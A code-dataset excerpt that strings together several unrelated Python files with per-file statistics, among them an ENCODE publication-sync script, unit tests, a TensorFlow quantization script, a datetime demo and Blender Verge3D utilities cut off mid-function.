pmid logger.info('%s' % log) post_dict = { "title": pmidData.get("title"), "abstract": pmidData.get("abstract"), "submitted_by": "/users/8b1f8780-b5d6-4fb7-a5a2-ddcec9054288/", "lab": "/labs/encode-consortium/", "award": "/awards/ENCODE/", "categories": extraData.get("categories"), "published_by": extraData.get("published_by"), "date_published": pmidData.get("date_published"), "authors": pmidData.get("authors"), "identifiers": ["PMID:" + pmid], "journal": pmidData.get("journal"), "volume": pmidData.get("volume"), "issue": pmidData.get("issue"), "page": pmidData.get("page"), "status": "published" } if extraData.get("data_used"): post_dict["data_used"] = extraData.get("data_used") encodedcc.new_ENCODE(connection, "publications", post_dict) def compare_entrez_ENCODE(self, uuid, pmid, connection, extraData={}): '''compares value in ENCODE database to results from Entrez ''' encode = encodedcc.get_ENCODE(uuid, connection) entrez = self.entrezDict.get(pmid) patch = False if not entrez: log = "PMID " + pmid + " was not found in Entrez database!!" logger.warning('%s' % log) else: log = "PMID " + pmid logger.info('%s' % log) for key in entrez.keys(): if key in encode.keys(): if entrez[key] == encode[key]: log = "entrez key \"" + key + "\" matches encode key" logger.info('%s' % log) else: log = "\"" + key + "\" value in encode database does not match value in entrez database" logger.warning('%s' % log) log = "\tENTREZ: " + entrez[key] + "\n\tENCODE: " + encode[key] logger.warning('%s' % log) if self.UPDATE or self.UPDATE_ONLY: log = "PATCH in the new value for \"" + key + "\"" logger.info('%s' % log) patch_dict = {key: entrez[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True else: log = "ENCODE missing \"" + key + "\" from Entrez. New key and value must be added" logger.warning('%s' % log) if self.UPDATE or self.UPDATE_ONLY: log = "PATCHing in new key \"" + key + "\"" logger.info('%s' % log) patch_dict = {key: entrez[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True if not self.UPDATE_ONLY: for key in extraData.keys(): if type(extraData.get(key)) is list: if set(encode.get(key, [])) == set(extraData.get(key, [])): log = "encode \"" + key + "\" matches data in file" logger.info('%s' % log) else: log = "encode \"" + key + "\" value" + str(encode.get(key, [])) + "does not match file" logger.warning('%s' % log) if self.UPDATE: if any(extraData[key]): patch_dict = {key: extraData[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True else: log = "No value in file to input for \"" + key + "\"" logger.warning('%s' % log) if type(extraData.get(key)) is str: if encode.get(key, "") == extraData.get(key, ""): log = "encode \"" + key + "\" matches data in file" logger.info('%s' % log) else: log = "encode \"" + key + "\" value" + str(encode.get(key, "")) + "does not match file" logger.warning('%s' % log) if self.UPDATE: patch_dict = {key: extraData[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True if encode.get("status", "") != "published" and (self.UPDATE or self.UPDATE_ONLY): log = "Setting status to published" logger.info('%s' % log) encodedcc.patch_ENCODE(uuid, connection, {"status": "published"}) patch = True if patch is True: self.PATCH_COUNT += 1 def find_ENCODE_extras(self, communityList, consortiumList, connection): '''finds any publications in the ENCODE database that are not in the files provided ''' community_url = "/search/?type=publication&status=published\ &published_by=community&field=identifiers&limit=all" consortium_url = "/search/?type=publication&status=published\ &published_by!=community&field=identifiers&limit=all" communityResult = encodedcc.get_ENCODE(community_url, connection).get("@graph") consortiumResult = encodedcc.get_ENCODE(consortium_url, connection).get("@graph") communityPMIDfromENCODE = [] # list of PMID from ENCODE site communityOtherID = [] # list of non-PMID ids from ENCODE site for pub in communityResult: temp = pub.get("identifiers", []) for idNum in temp: if "PMID:" in idNum: communityPMIDfromENCODE.append(idNum) # this is something that has a pubmed ID elif "PMCID:PMC" in idNum: pass # this is an alternate PMID else: uuid = pub.get("@id") communityOtherID.append(uuid) # this is something that does not have a PMID yet, find it and PATCH it in community_ENCODE_Only = list(set(communityPMIDfromENCODE) - set(communityList)) consortiumPMIDfromENCODE = [] # list of PMID from ENCODE site consortiumOtherID = [] # list of non-PMID ids from ENCODE site for pub in consortiumResult: temp = pub.get("identifiers", []) for idNum in temp: if "PMID:" in idNum: consortiumPMIDfromENCODE.append(idNum) # this is something that has a pubmed ID elif "PMCID:PMC" in idNum: pass # this is an alternate PMID else: uuid = pub.get("@id") consortiumOtherID.append(uuid) # this is something that does not have a PMID yet, find it and PATCH it in consortium_ENCODE_Only = list(set(consortiumPMIDfromENCODE) - set(consortiumList)) return community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID def main(): args = getArgs() outfile = args.outfile CREATE_ONLY = args.createonly UPDATE_ONLY = args.updateonly Entrez.email = args.email key = encodedcc.ENC_Key(args.keyfile, args.key) connection = encodedcc.ENC_Connection(key) if args.debug: logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) print("Running on ", connection.server) publication = PublicationUpdate(args) if not UPDATE_ONLY: publication.setup_publication() pmidList = publication.consortium_ids + publication.community_ids mergeDicts = publication.consortium_dict.copy() mergeDicts.update(publication.community_dict) # holds published_by, categories, and data_used if not CREATE_ONLY: publication.get_entrez(pmidList) community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID = publication.find_ENCODE_extras(publication.community_ids, publication.consortium_ids, connection) total_ENCODE_only = len(community_ENCODE_Only) + len(consortium_ENCODE_Only) allOtherIDs = communityOtherID + consortiumOtherID publication.check_ENCODE(pmidList, connection, allOtherIDs, mergeDicts) log = str(total_ENCODE_only) + " items in ENCODE but not in files" logger.info('%s' % log) log = str(publication.PATCH_COUNT) + " publication files PATCHed" logger.info('%s' % log) log = str(publication.POST_COUNT) + " publication files POSTed" logger.info('%s' % log) print("Results printed to", outfile) else: infile = UPDATE_ONLY with open(infile, 'r') as readfile: uuidList = [x.rstrip('\n') for x in readfile] # check each publication to see if it has a PMID, if it does add it to the PMIDlist # if it does not have one look it up on Entrez pmid_uuid_dict = {} for uuid in uuidList: pub = encodedcc.get_ENCODE(uuid, connection) title = pub.get("title", "") identifiers = pub.get("identifiers", []) found = False for i in identifiers: if "PMID:" in i: p = i.split(":")[1] found = True if found: pmid_uuid_dict[p] = uuid else: # search Entrez for publication by title handle = Entrez.esearch(db="pubmed", term=title) record = Entrez.read(handle) idlist = record["IdList"] if len(idlist) > 1: log = "More than one possible PMID found for " + uuid logger.error('%s' % log) log = str(idlist) + " are possible PMIDs" logger.error('%s' % log) elif len(idlist) == 0: log = "No possible PMID found for " + uuid logger.error('%s' % log) else: handle = Entrez.efetch(db="pubmed", id=idlist, rettype="medline", retmode="text") records = Medline.parse(handle) # save the records, you can convert them to a list records = list(records) for record in records: pm = record.get("PMID") ti = record.get("TI") log = "Publication " + uuid + " with title \"" + title + "\" matches PMID:" + pm + " with title \"" + ti + "\"" logger.info('%s' % log) identifiers.append("PMID:" + pm) encodedcc.patch_ENCODE(uuid, connection, {"identifiers": identifiers}) pmid_uuid_dict[pm] = uuid pmidList = list(pmid_uuid_dict.keys()) publication.get_entrez(pmidList) with open("pub_update.txt", "w") as f: for pmid in pmid_uuid_dict.keys(): publication.compare_entrez_ENCODE(pmid_uuid_dict[pmid], pmid, connection) f.write(str(len(pmid_uuid_dict.keys())) + " publications checked " + str(publication.PATCH_COUNT) + " publications PATCHed") if __name__ == '__main__': main()
48.85814
228
0.524775
2,113
21,009
5.128727
0.17416
0.009228
0.013196
0.016794
0.341884
0.310418
0.295562
0.272031
0.258743
0.245917
0
0.005132
0.369318
21,009
429
229
48.972028
0.812755
0.051549
0
0.302949
0
0
0.153105
0.011091
0
0
0
0
0
1
0.021448
false
0.005362
0.018767
0
0.048257
0.013405
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c06645644d0ffeca98076ebecceb6c2c273402
2,044
py
Python
clusters/server/tests/day_test.py
ashsawh/stocks
3f8f0b10d606062ef3abb5160836eb23696f48b0
[ "Apache-2.0" ]
1
2019-07-29T20:23:39.000Z
2019-07-29T20:23:39.000Z
clusters/server/tests/day_test.py
ashsawh/stocks
3f8f0b10d606062ef3abb5160836eb23696f48b0
[ "Apache-2.0" ]
null
null
null
clusters/server/tests/day_test.py
ashsawh/stocks
3f8f0b10d606062ef3abb5160836eb23696f48b0
[ "Apache-2.0" ]
null
null
null
import unittest from src.factory import DayFactory, TransactionsFactory from src.value_objects import Stock, StockTransaction, CashTransaction from src.day import Day class DayTest(unittest.TestCase): def setUp(self): self.D0: Day = DayFactory().create("D0", ["AAPL 100", "GOOG 200", "SP500 175.75"], 1000) self.T0 = TransactionsFactory().create([ "AAPL SELL 100 30000", "GOOG BUY 10 10000", "CASH DEPOSIT 0 1000", "CASH FEE 0 50", "GOOG DIVIDEND 0 50", "TD BUY 100 10000" ]) self.stock_list = ["AAPL", "GOOG", "SP500"] def test_set_catalog(self): self.assertEqual(self.stock_list, self.D0.catalog) def test_get_stocks(self): self.assertEqual({"AAPL": 100, "GOOG": 200, "SP500": 175.75}, self.D0.get_stocks()) def test_add(self): stock = Stock("MSFT", 100) self.D0.add(stock) self.assertEqual(self.D0.stocks[3], stock) def test_fill(self): facebook = Stock("F", 100) uber = Stock("Uber", 100) stocks = [facebook, uber] length = len(self.D0.stocks) self.D0.fill(stocks) self.assertEqual(self.D0.stocks[length].symbol, facebook.symbol) def test_add_stock_transaction(self): self.D0.add_stock_transaction(self.T0[0]) self.assertEqual(self.D0.transactions["AAPL"][0]['amount'], -100) def test_add_cash_transaction(self): transaction = CashTransaction("CASH", "0", 1000, "DEPOSIT") self.D0.add_cash_transaction(transaction) self.assertEqual(self.D0.cash_transactions[0], 1000) def test_add_transactions(self): self.D0.transactions = [] self.D0.cash_transactions = [] def test_get_closing_stocks(self): self.assertEqual({'AAPL': 100.0, 'GOOG': 200.0, 'SP500': 175.75}, self.D0.get_closing_stocks()) def test_get_closing_cash(self): self.assertEqual(self.D0.get_closing_cash(), 1000) if __name__ == '__main__': unittest.main()
32.444444
103
0.631115
261
2,044
4.781609
0.252874
0.076923
0.091346
0.084135
0.14984
0.106571
0.038462
0
0
0
0
0.084659
0.231409
2,044
62
104
32.967742
0.709739
0
0
0
0
0
0.10274
0
0
0
0
0
0.170213
1
0.212766
false
0
0.085106
0
0.319149
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
99c08d33e58da9e15438ec52e98fb7ac7d97d9d5
2,832
py
Python
src/export_quantized.py
mbuckler/squeezeDet-low-precision
2c5c700d9e7c36cb611bb905e209f718dfbf177a
[ "BSD-2-Clause" ]
2
2019-08-07T21:18:03.000Z
2020-07-26T16:27:31.000Z
src/export_quantized.py
mbuckler/squeezeDet-low-precision
2c5c700d9e7c36cb611bb905e209f718dfbf177a
[ "BSD-2-Clause" ]
null
null
null
src/export_quantized.py
mbuckler/squeezeDet-low-precision
2c5c700d9e7c36cb611bb905e209f718dfbf177a
[ "BSD-2-Clause" ]
null
null
null
# Author: Mark Buckler """Quantization""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import cv2 from datetime import datetime import os.path import sys import time import numpy as np from six.moves import xrange import tensorflow as tf from config import * from dataset import pascal_voc, kitti from utils.util import bbox_transform, Timer from nets import * FLAGS = tf.app.flags.FLAGS tf.app.flags.DEFINE_string('checkpoint_path', '/tmp/bichen/logs/squeezeDet/train', """Path to the training checkpoint.""") tf.app.flags.DEFINE_string('net', 'squeezeDet', """Neural net architecture.""") from tensorflow.python import pywrap_tensorflow def quantize(): os.environ['CUDA_VISIBLE_DEVICES'] = '0' with tf.Graph().as_default() as g: assert FLAGS.net == 'vgg16' or FLAGS.net == 'resnet50' \ or FLAGS.net == 'squeezeDet' or FLAGS.net == 'squeezeDet+', \ 'Selected neural net architecture not supported: {}'.format(FLAGS.net) if FLAGS.net == 'vgg16': mc = kitti_vgg16_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = VGG16ConvDet(mc) elif FLAGS.net == 'resnet50': mc = kitti_res50_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = ResNet50ConvDet(mc) elif FLAGS.net == 'squeezeDet': mc = kitti_squeezeDet_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = SqueezeDet(mc) elif FLAGS.net == 'squeezeDet+': mc = kitti_squeezeDetPlus_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = SqueezeDetPlus(mc) # Start a session with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess: # Load in the metagraph ckpt_path = FLAGS.checkpoint_path saver = tf.train.import_meta_graph(ckpt_path+'.meta',clear_devices=True) saver.restore(sess, ckpt_path) # Initialize the variables sess.run(tf.global_variables_initializer()) # Extract the variables into a list all_vars = tf.all_variables() for var in all_vars: if (('kernels' in var.name) and (not ('Momentum' in var.name))): print(var.name) print(sess.run(var)) add_1_op = tf.assign(var,var + 1) sess.run(add_1_op) print(sess.run(var)) exit() return def main(argv=None): # pylint: disable=unused-argument quantize() if __name__ == '__main__': tf.app.run()
29.810526
82
0.641243
363
2,832
4.812672
0.363636
0.041214
0.045793
0.038924
0.230109
0.204923
0.204923
0.169433
0.169433
0.169433
0
0.013731
0.254237
2,832
94
83
30.12766
0.813447
0.106992
0
0.151515
0
0
0.093213
0.013491
0
0
0
0.010638
0.015152
1
0.030303
false
0
0.257576
0
0.30303
0.060606
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
99c11294cdaedfbcacc68dc5da7e71c76a3c5c19
579
py
Python
medium/remove_nth_node_from_end_of_list.py
Jswig/leetcode
ca9ca182ab7824d642aa5ebbe5974669d2a6221c
[ "MIT" ]
null
null
null
medium/remove_nth_node_from_end_of_list.py
Jswig/leetcode
ca9ca182ab7824d642aa5ebbe5974669d2a6221c
[ "MIT" ]
null
null
null
medium/remove_nth_node_from_end_of_list.py
Jswig/leetcode
ca9ca182ab7824d642aa5ebbe5974669d2a6221c
[ "MIT" ]
null
null
null
# Anders Poirel class ListNode: def __init__(self, x): self.val = x self.next = None class Solution: def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode: fast = head slow = head for i in range(n-1): fast = fast.next while fast.next is not None: fast = fast.next prev = slow slow = slow.next if slow == head: head = slow.next else: prev.next = slow.next return head
21.444444
67
0.462867
64
579
4.125
0.46875
0.090909
0.090909
0
0
0
0
0
0
0
0
0.003205
0.46114
579
27
68
21.444444
0.842949
0.022453
0
0.105263
0
0
0
0
0
0
0
0
0
1
0.105263
false
0
0
0
0.263158
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c2e61e389f9dd7c525b31829b0d447fc52f4de
1,674
py
Python
tests/community/test_pushbullet.py
soasme/runflow
b23086c2487a157b8c2d40f6225a1bcd9e8b6c60
[ "Apache-2.0" ]
6
2021-06-07T01:26:19.000Z
2021-07-02T12:57:07.000Z
tests/community/test_pushbullet.py
soasme/runflow
b23086c2487a157b8c2d40f6225a1bcd9e8b6c60
[ "Apache-2.0" ]
2
2021-06-06T02:56:37.000Z
2021-06-07T04:06:23.000Z
tests/community/test_pushbullet.py
soasme/runflow
b23086c2487a157b8c2d40f6225a1bcd9e8b6c60
[ "Apache-2.0" ]
null
null
null
import pytest from runflow import runflow pytest.importorskip('slack_sdk') def test_pushbullet_push_note(mocker): pb = mocker.MagicMock() mocker.patch('pushbullet.Pushbullet', pb) runflow(path="examples/pushbullet_push_note.hcl", vars={ 'pushbullet_api_key': 'any' }) pb.return_value.push_note.assert_called_with( title='This is the title', body='This is the note', email='', channel=None, ) def test_pushbullet_push_link(mocker): pb = mocker.MagicMock() mocker.patch('pushbullet.Pushbullet', pb) runflow(path="examples/pushbullet_push_link.hcl", vars={ 'pushbullet_api_key': 'any' }) pb.return_value.push_link.assert_called_with( title='This is the title', url='https://runflow.org', body='', email='', channel=None, ) def test_pushbullet_push_file(mocker): pb = mocker.MagicMock() mocker.patch('pushbullet.Pushbullet', pb) runflow(path="examples/pushbullet_push_file.hcl", vars={ 'pushbullet_api_key': 'any', }) pb.return_value.push_file.assert_called_with( title='This is the title', body='This is the body', file_type='image/jpeg', file_name='cat.jpg', file_url='https://i.imgur.com/IAYZ20i.jpg', email='', channel=None, ) def test_pushbullet_invalid_client(mocker, capsys): pb = mocker.MagicMock() mocker.patch('pushbullet.Pushbullet', pb) runflow(source=""" flow "invalid_client" { task "pushbullet_push" "this" { client = { } } } """) out, err = capsys.readouterr() assert 'set api_key' in err
23.914286
60
0.635006
202
1,674
5.049505
0.306931
0.096078
0.044118
0.090196
0.677451
0.677451
0.645098
0.572549
0.538235
0.482353
0
0.001552
0.229988
1,674
69
61
24.26087
0.78976
0
0
0.392857
0
0
0.30227
0.109319
0
0
0
0
0.071429
1
0.071429
false
0
0.053571
0
0.125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c393d65fd469c4d0c7d4d4470fc5c12bb10a44
3,269
py
Python
ch02/dateandtime.py
ibiscum/Learn-Python-Programming-Third-Edition
c8e0061e97b16c9b55250cc720a8bc7613cb6cca
[ "MIT" ]
null
null
null
ch02/dateandtime.py
ibiscum/Learn-Python-Programming-Third-Edition
c8e0061e97b16c9b55250cc720a8bc7613cb6cca
[ "MIT" ]
null
null
null
ch02/dateandtime.py
ibiscum/Learn-Python-Programming-Third-Edition
c8e0061e97b16c9b55250cc720a8bc7613cb6cca
[ "MIT" ]
null
null
null
"""Date and time""" # imports import arrow from datetime import date, datetime, timedelta, timezone import time import calendar as cal from zoneinfo import ZoneInfo # arrow small demo # date today = date.today() print(today) # datetime.date(2021, 3, 28) print(today.ctime()) print(today.isoformat()) print(today.weekday()) print(cal.day_name[today.weekday()]) print(today.day, today.month, today.year) print(today.timetuple()) # print(time.struct_time(tm_year=2021, tm_mon=3, tm_mday=28, tm_hour=0, tm_min=0, tm_sec=0, # tm_wday=6, tm_yday=87, tm_isdst=-1)) # time time.ctime() print(time.daylight) time.gmtime() # time.struct_time( # tm_year=2021, tm_mon=3, tm_mday=28, # tm_hour=14, tm_min=23, tm_sec=34, # tm_wday=6, tm_yday=87, tm_isdst=0 # ) time.gmtime(0) # time.struct_time( # tm_year=1970, tm_mon=1, tm_mday=1, # tm_hour=0, tm_min=0, tm_sec=0, # tm_wday=3, tm_yday=1, tm_isdst=0 # ) time.localtime() # time.struct_time( # tm_year=2021, tm_mon=3, tm_mday=28, # tm_hour=15, tm_min=23, tm_sec=50, # tm_wday=6, tm_yday=87, tm_isdst=1 # ) time.time() # datetime, timezones and timedelta now = datetime.now() utcnow = datetime.utcnow() print(now) # datetime.datetime(2021, 3, 28, 15, 25, 16, 258274) print(utcnow) # datetime.datetime(2021, 3, 28, 14, 25, 22, 918195) print(now.date()) # datetime.date(2021, 3, 28) print(now.day, now.month, now.year) var = now.date() == date.today() print(now.time()) # datetime.time(15, 25, 16, 258274) # now.hour, now.minute, now.second, now.microsecond now.ctime() # 'Sun Mar 28 15:25:16 2021' now.isoformat() # '2021-03-28T15:25:16.258274' now.timetuple() # time.struct_time( # tm_year=2021, tm_mon=3, tm_mday=28, # tm_hour=15, tm_min=25, tm_sec=16, # tm_wday=6, tm_yday=87, tm_isdst=-1 # ) print(now.tzinfo) print(utcnow.tzinfo) now.weekday() # 6 f_bday = datetime( 1975, 12, 29, 12, 50, tzinfo=ZoneInfo('Europe/Rome') ) h_bday = datetime( 1981, 10, 7, 15, 30, 50, tzinfo=timezone(timedelta(hours=2)) ) diff = h_bday - f_bday type(diff) # <class 'datetime.timedelta'> print(diff.days) # 2109 diff.total_seconds() # 182223650.0 today + timedelta(days=49) # datetime.date(2021, 5, 16) now + timedelta(weeks=7) # datetime.datetime(2021, 5, 16, 15, 25, 16, 258274) # parsing (stdlib) datetime.fromisoformat('1977-11-24T19:30:13+01:00') # datetime.datetime( # 1977, 11, 24, 19, 30, 13, # tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)) # ) datetime.fromtimestamp(time.time()) # datetime.datetime(2021, 3, 28, 15, 42, 2, 142696) datetime.now() # datetime.datetime(2021, 3, 28, 15, 42, 1, 120094) arrow.utcnow() # <Arrow [2021-03-28T14:43:20.017213+00:00]> arrow.now() # <Arrow [2021-03-28T15:43:39.370099+01:00]> local = arrow.now('Europe/Rome') print(local) # <Arrow [2021-03-28T16:59:14.093960+02:00]> local.to('utc') # <Arrow [2021-03-28T14:59:14.093960+00:00]> local.to('Europe/Moscow') # <Arrow [2021-03-28T17:59:14.093960+03:00]> local.to('Asia/Tokyo') # <Arrow [2021-03-28T23:59:14.093960+09:00]> print(local.datetime) # datetime.datetime( # 2021, 3, 28, 16, 59, 14, 93960, # tzinfo=tzfile('/usr/share/zoneinfo/Europe/Rome') # ) local.isoformat() # '2021-03-28T16:59:14.093960+02:00'
20.955128
91
0.67513
547
3,269
3.932358
0.243144
0.059507
0.02278
0.037192
0.280335
0.240818
0.218503
0.178987
0.145514
0.134821
0
0.17903
0.142245
3,269
155
92
21.090323
0.588088
0.559498
0
0
0
0
0.053052
0.018169
0
0
0
0
0
1
0
false
0
0.087719
0
0.087719
0.315789
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c5edc4f3f5114316b3f4fae670cf161eac7a79
15,176
py
Python
utils.py
Soft8Soft/verge3d-blender-addon
20a7ca153285e4744a7079bc015584271a50a252
[ "Apache-2.0" ]
86
2018-08-14T17:08:27.000Z
2022-03-22T10:35:28.000Z
utils.py
Soft8Soft/verge3d-blender-addon
20a7ca153285e4744a7079bc015584271a50a252
[ "Apache-2.0" ]
3
2018-08-16T16:32:26.000Z
2021-01-31T11:09:01.000Z
utils.py
Soft8Soft/verge3d-blender-addon
20a7ca153285e4744a7079bc015584271a50a252
[ "Apache-2.0" ]
18
2018-08-15T10:32:19.000Z
2022-02-28T16:41:51.000Z
# Copyright (c) 2017-2019 Soft8Soft LLC # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. import math import bpy import numpy as np import mathutils import pyosl.glslgen ORTHO_EPS = 1e-5 DEFAULT_MAT_NAME = 'v3d_default_material' selectedObject = None selectedObjectsSave = [] prevActiveObject = None def clamp(val, minval, maxval): return max(minval, min(maxval, val)) def integerToBlSuffix(val): suf = str(val) for i in range(0, 3 - len(suf)): suf = '0' + suf return suf def getLightCyclesStrength(bl_light): return bl_light.energy def getLightCyclesColor(bl_light): col = bl_light.color return [col[0], col[1], col[2]] def setSelectedObject(bl_obj): """ Select object for NLA baking """ global prevActiveObject global selectedObject, selectedObjectsSave selectedObject = bl_obj selectedObjectsSave = bpy.context.selected_objects.copy() # NOTE: seems like we need both selection and setting active object for o in selectedObjectsSave: o.select_set(False) prevActiveObject = bpy.context.view_layer.objects.active bpy.context.view_layer.objects.active = bl_obj bl_obj.select_set(True) def restoreSelectedObjects(): global prevActiveObject global selectedObject, selectedObjectsSave selectedObject.select_set(False) for o in selectedObjectsSave: o.select_set(True) bpy.context.view_layer.objects.active = prevActiveObject prevActiveObject = None selectedObject = None selectedObjectsSave = [] def getSceneByObject(obj): for scene in bpy.data.scenes: index = scene.objects.find(obj.name) if index > -1 and scene.objects[index] == obj: return scene return None def getTexImage(bl_tex): """ Get texture image from a texture, avoiding AttributeError for textures without an image (e.g. a texture of type 'NONE'). """ return getattr(bl_tex, 'image', None) def getTextureName(bl_texture): if (isinstance(bl_texture, (bpy.types.ShaderNodeTexImage, bpy.types.ShaderNodeTexEnvironment))): tex_name = bl_texture.image.name else: tex_name = bl_texture.name return tex_name def mat4IsIdentity(mat4): return mat4 == mathutils.Matrix.Identity(4) def mat4IsTRSDecomposable(mat4): # don't use mathutils.Matrix.is_orthogonal_axis_vectors property, because it # doesn't normalize vectors before checking mat = mat4.to_3x3().transposed() v0 = mat[0].normalized() v1 = mat[1].normalized() v2 = mat[2].normalized() return (abs(v0.dot(v1)) < ORTHO_EPS and abs(v0.dot(v2)) < ORTHO_EPS and abs(v1.dot(v2)) < ORTHO_EPS) def mat4SvdDecomposeToMatrs(mat4): """ Decompose the given matrix into a couple of TRS-decomposable matrices or Returns None in case of an error. """ try: u, s, vh = np.linalg.svd(mat4.to_3x3()) mat_u = mathutils.Matrix(u) mat_s = mathutils.Matrix([[s[0], 0, 0], [0, s[1], 0], [0, 0, s[2]]]) mat_vh = mathutils.Matrix(vh) # NOTE: a potential reflection part in U and VH matrices isn't considered mat_trans = mathutils.Matrix.Translation(mat4.to_translation()) mat_left = mat_trans @ (mat_u @ mat_s).to_4x4() return (mat_left, mat_vh.to_4x4()) except np.linalg.LinAlgError: # numpy failed to decompose the matrix return None def findArmature(obj): for mod in obj.modifiers: if mod.type == 'ARMATURE' and mod.object is not None: return mod.object # use obj.find_armature as a last resort, because it doesn't work with many # armature modifiers return obj.find_armature() def matHasBlendBackside(bl_mat): return (matIsBlend(bl_mat) and (hasattr(bl_mat, 'show_transparent_back') and bl_mat.show_transparent_back)) def matIsBlend(bl_mat): return bl_mat.blend_method in ['BLEND', 'MULTIPLY', 'ADD'] def updateOrbitCameraView(cam_obj, scene): target_obj = cam_obj.data.v3d.orbit_target_object eye = cam_obj.matrix_world.to_translation() target = (cam_obj.data.v3d.orbit_target if target_obj is None else target_obj.matrix_world.to_translation()) quat = getLookAtAlignedUpMatrix(eye, target).to_quaternion() quat.rotate(cam_obj.matrix_world.inverted()) quat.rotate(cam_obj.matrix_basis) rot_mode = cam_obj.rotation_mode cam_obj.rotation_mode = 'QUATERNION' cam_obj.rotation_quaternion = quat cam_obj.rotation_mode = rot_mode # need to update the camera state (i.e. world matrix) immediately in case of # several consecutive UI updates bpy.context.view_layer.update() def getLookAtAlignedUpMatrix(eye, target): """ This method uses camera axes for building the matrix. """ axis_z = (eye - target).normalized() if axis_z.length == 0: axis_z = mathutils.Vector((0, -1, 0)) axis_x = mathutils.Vector((0, 0, 1)).cross(axis_z) if axis_x.length == 0: axis_x = mathutils.Vector((1, 0, 0)) axis_y = axis_z.cross(axis_x) return mathutils.Matrix([ axis_x, axis_y, axis_z, ]).transposed() def objDataUsesLineRendering(bl_obj_data): line_settings = getattr(getattr(bl_obj_data, 'v3d', None), 'line_rendering_settings', None) return bool(line_settings and line_settings.enable) def getObjectAllCollections(blObj): return [coll for coll in bpy.data.collections if blObj in coll.all_objects[:]] def getBlurPixelRadius(context, blLight): if blLight.type == 'SUN': relativeRadius = (blLight.shadow_buffer_soft / 100 * int(context.scene.eevee.shadow_cascade_size)) # blur strength doesn't increase after a certain point return min(max(relativeRadius, 0), 100) else: blurGrade = math.floor(blLight.shadow_buffer_soft * int(context.scene.eevee.shadow_cube_size) / 1000) blurGrade = min(blurGrade, 9) # some approximation of Blender blur radius if blurGrade > 2: return 4.22 * (blurGrade - 1.5) else: return blurGrade def objHasExportedModifiers(obj): """ Check if an object has any modifiers that should be applied before export. """ return any([modifierNeedsExport(mod) for mod in obj.modifiers]) def obj_del_not_exported_modifiers(obj): """ Remove modifiers that shouldn't be applied before export from an object. """ for mod in obj.modifiers: if not modifierNeedsExport(mod): obj.modifiers.remove(mod) def objAddTriModifier(obj): mod = obj.modifiers.new('Temporary_Triangulation', 'TRIANGULATE') mod.quad_method = 'FIXED' mod.keep_custom_normals = True def objApplyModifiers(obj): """ Creates a new mesh from applying modifiers to the mesh of the given object. Assignes the newly created mesh to the given object. The old mesh's user count will be decreased by 1. """ dg = bpy.context.evaluated_depsgraph_get() need_linking = dg.scene.collection.objects.find(obj.name) == -1 need_showing = obj.hide_viewport # NOTE: link the object if it's not in the 'Master Collection' and update # the view layer to make the depsgraph able to apply modifiers to the object if need_linking: dg.scene.collection.objects.link(obj) obj.update_tag() # a hidden object doesn't get its modifiers applied, need to make it visible # before updating the view layer if need_showing: obj.hide_viewport = False bpy.context.view_layer.update() # NOTE: some modifiers can remove UV layers from an object after applying # (e.g. Skin), which is a consistent behavior regarding uv usage in the # viewport (e.g. degenerate tangent space in the Normal Map node) obj_eval = obj.evaluated_get(dg) obj.data = bpy.data.meshes.new_from_object(obj_eval, preserve_all_data_layers=True, depsgraph=dg) obj.modifiers.clear() if need_linking: dg.scene.collection.objects.unlink(obj) if need_showing: obj.hide_viewport = True def objTransferShapeKeys(obj_from, obj_to, depsgraph): """ Transfer shape keys from one object to another if it's possible: - obj_from should be in the current view layer to be evaluated by depsgraph - obj_to should not have shape keys - obj_from (after evaluating) and obj_to should have the same amount of vertices Returns a boolean flag indicating successful transfer. """ if obj_from.data.shape_keys is None: return True key_blocks_from = obj_from.data.shape_keys.key_blocks keys_from = [key for key in key_blocks_from if key != key.relative_key and key != obj_from.data.shape_keys.reference_key] key_names = [key.name for key in keys_from] key_values = [key.value for key in keys_from] key_positions = [] for key in keys_from: key.value = 0 same_vertex_count = True for key in keys_from: key.value = 1 obj_from.update_tag() bpy.context.view_layer.update() verts = obj_from.evaluated_get(depsgraph).data.vertices if len(verts) != len(obj_to.data.vertices): 